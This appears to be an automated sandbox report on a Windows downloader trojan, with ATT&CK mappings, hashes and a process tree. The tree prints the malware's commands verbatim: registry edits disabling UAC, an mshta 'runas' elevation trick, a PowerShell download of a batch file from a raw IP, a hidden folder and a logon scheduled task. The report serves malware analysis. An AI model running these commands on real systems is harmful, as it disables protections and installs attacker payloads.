2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d

Analysis

max time kernel
147s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
28-09-2024 11:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

av_downloader1.1.2.exe
Size

88KB
MD5

759f5a6e3daa4972d43bd4a5edbdeb11
SHA1

36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256

2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512

f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
SSDEEP

1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV

Score

10^/10

defense_evasion discovery evasion execution privilege_escalation trojan

Malware Config

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
16	1980	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1980	powershell.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1856	attrib.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	av_downloader1.1.2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	AV_DOW~1.EXE

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
3836	mshta.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	av_downloader1.1.2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AV_DOW~1.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5008	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1980	powershell.exe
1980	powershell.exe
1912	msedge.exe
1912	msedge.exe
3080	msedge.exe
3080	msedge.exe
3412	identity_helper.exe
3412	identity_helper.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1980	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe
3080	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1604 wrote to memory of 2344	1604	av_downloader1.1.2.exe	82
PID 1604 wrote to memory of 2344	1604	av_downloader1.1.2.exe	82
PID 2344 wrote to memory of 3836	2344	cmd.exe	85
PID 2344 wrote to memory of 3836	2344	cmd.exe	85
PID 3836 wrote to memory of 4388	3836	mshta.exe	86
PID 3836 wrote to memory of 4388	3836	mshta.exe	86
PID 3836 wrote to memory of 4388	3836	mshta.exe	86
PID 4388 wrote to memory of 4040	4388	AV_DOW~1.EXE	87
PID 4388 wrote to memory of 4040	4388	AV_DOW~1.EXE	87
PID 4040 wrote to memory of 4968	4040	cmd.exe	89
PID 4040 wrote to memory of 4968	4040	cmd.exe	89
PID 4040 wrote to memory of 1468	4040	cmd.exe	90
PID 4040 wrote to memory of 1468	4040	cmd.exe	90
PID 4040 wrote to memory of 4212	4040	cmd.exe	91
PID 4040 wrote to memory of 4212	4040	cmd.exe	91
PID 4040 wrote to memory of 944	4040	cmd.exe	92
PID 4040 wrote to memory of 944	4040	cmd.exe	92
PID 944 wrote to memory of 3524	944	cmd.exe	93
PID 944 wrote to memory of 3524	944	cmd.exe	93
PID 4040 wrote to memory of 3080	4040	cmd.exe	94
PID 4040 wrote to memory of 3080	4040	cmd.exe	94
PID 4040 wrote to memory of 1856	4040	cmd.exe	95
PID 4040 wrote to memory of 1856	4040	cmd.exe	95
PID 3080 wrote to memory of 4064	3080	msedge.exe	96
PID 3080 wrote to memory of 4064	3080	msedge.exe	96
PID 4040 wrote to memory of 1980	4040	cmd.exe	97
PID 4040 wrote to memory of 1980	4040	cmd.exe	97
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98
PID 3080 wrote to memory of 3292	3080	msedge.exe	98

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1856	attrib.exe

C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.2.exe
"C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.2.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1604
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\8CC0.tmp\8CC1.bat C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.2.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2344
- - C:\Windows\system32\mshta.exe
    mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
    3⤵
    - Checks computer location settings
    - Access Token Manipulation: Create Process with Token
    - Suspicious use of WriteProcessMemory
    PID:3836
  - - C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE
      "C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE" goto :target
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4388
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8FCC.tmp\8FCD.tmp\8FCE.bat C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE goto :target"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4040
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:4968
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:1468
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:4212
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:944
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        7⤵
        
        PID:3524
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:3080
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff221c46f8,0x7fff221c4708,0x7fff221c4718
        7⤵
        
        PID:4064
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1972 /prefetch:2
        7⤵
        
        PID:3292
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1912
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
        7⤵
        
        PID:4720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
        7⤵
        
        PID:2068
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
        7⤵
        
        PID:4852
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
        7⤵
        
        PID:3472
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
        7⤵
        
        PID:5024
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3412
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
        7⤵
        
        PID:4728
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2164 /prefetch:1
        7⤵
        
        PID:5084
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
        7⤵
        
        PID:4004
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
        7⤵
        
        PID:2772
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1464,6654990440893329619,18185765319840365486,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5620 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3988
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1856
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1980
      - C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5008

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2064

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b9569e123772ae290f9bac07e0d31748

SHA1
5806ed9b301d4178a959b26d7b7ccf2c0abc6741

SHA256
20ab88e23fb88186b82047cd0d6dc3cfa23422e4fd2b8f3c8437546a2a842c2b

SHA512
cfad8ce716ac815b37e8cc0e30141bfb3ca7f0d4ef101289bddcf6ed3c579bc34d369f2ec2f2dab98707843015633988eb97f1e911728031dd897750b8587795

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
eeaa8087eba2f63f31e599f6a7b46ef4

SHA1
f639519deee0766a39cfe258d2ac48e3a9d5ac03

SHA256
50fe80c9435f601c30517d10f6a8a0ca6ff8ca2add7584df377371b5a5dbe2d9

SHA512
eaabfad92c84f422267615c55a863af12823c5e791bdcb30cabe17f72025e07df7383cf6cf0f08e28aa18a31c2aac5985cf5281a403e22fbcc1fb5e61c49fc3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
816B

MD5
78de475f2e839da35b4edc146207bf74

SHA1
80a2112793a7e80540d36b37fb6931944d9c2836

SHA256
dca9e7f04a0a61e4edae1211eb9d5b8322d72effa454cc31b26bc03b6e18cdb2

SHA512
cae8b13ac9ee3d5bf27cf3f79be048020defbe03c3f1c8e3e5067d859f4b4b49782de2fe1b87fdc1dadece7238a730038c6b6cccda59432e3e3d41d9047924da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
f3657823787d438a118b5635a5da94bc

SHA1
f57753b310b479c38c523f2bb52992f4a4575ee0

SHA256
9befe0a51d282937cf113884ddb558e0871cd093b008aaf536773b61c7e26855

SHA512
67ed5e308e89bf4fd0623fdb1f11c150c481bcf6874e15c502da9c6682f6b7b7eb191554673e96b2ad40b41cad3b53ecdbc38a56a5b6a492a86dffab3e308dd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
284eafd48d22233eca8dd221a1181de1

SHA1
6ffb180e505c9ac000b91ae9e7edd2e8ba802e03

SHA256
6e068a0c23b87aa9ea7092115c73f8350a7135422a384d012647a09f90b952d9

SHA512
e4ec60984e7af9cc788c6858b73efe90cb90ba7ff2de6fab94f93d81622278bf25f2c8a204f05ebb30cc349509738e7ec3d163f03d2973b411e0b7e4f56c0957

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c2fdae71d11b2c1d0649f7f8fb8649bb

SHA1
c5391de3ef92706f4ed865340fc59b757fc76787

SHA256
d732d0d46013d588eaa925ff5e18c4e002a4fb548de1cf8edbafca36a4de1cb1

SHA512
525331379b61651f71933885ced1c9e42753f76755aca481a99de44c73e049e07f9d056384f1fabb4bde258546aa932b26f36b0c6a5232b4ebbdbe549b8859f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
5d0114c44913650cb7d651904c7f3cf9

SHA1
f009a9305ce3b3fdbf2f74b75f333686a4db5284

SHA256
21c4bce68cbc6c63cce498f9451dc26452b23bf5145911014fab367c1ad97845

SHA512
fd1f526db41bc0111790ca2634c84feba1cc2ac6dd4eb628be51d7f7b44f43439a7a780aa58b7e0802e825d64d76700f83506faa2d2ea1ae4771055f06e7cb8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57ef71.TMP

Filesize
48B

MD5
205d8e489b361a812807f3ff7df2cc2c

SHA1
2c96ad79fcbaa6229519c1780800693a77cd0aaa

SHA256
1fb46708ff5f9cd25e134bca2a760dce90942fac5cbd70d48a98ab2c674dd398

SHA512
7f7ae2591c67aaa11a7b0dd334528a8454261aad1714d9ebbfba3b0f4d088388a503deed95e9ec6bd148274874f7445391b0f47dc23a4d0513806864d740cf05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
fbd3c3f6e8a0d63730c42bbb109f3b9e

SHA1
dbc768377527a7da8c6d8fc4e64e16ae7711f17a

SHA256
85c5927bd36dbaf29e31989c9be2405793d97053e594116361c6c08c4558bec3

SHA512
9c2d9bdf686a30b1108e6e20c8252556636dbfee18a9bfbd1cdce51c4166b788597d74479275d7c811d9531b527a6181ed90c22680a7f6a5080c4b9fad7ee6ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\8CC0.tmp\8CC1.bat

Filesize
1KB

MD5
9856d2fe29a28c54c5943c2150f7bae1

SHA1
f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97

SHA256
0b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999

SHA512
002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4rwcduog.n53.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1980-17-0x0000017A99BC0000-0x0000017A99BE2000-memory.dmp

Filesize
136KB

Download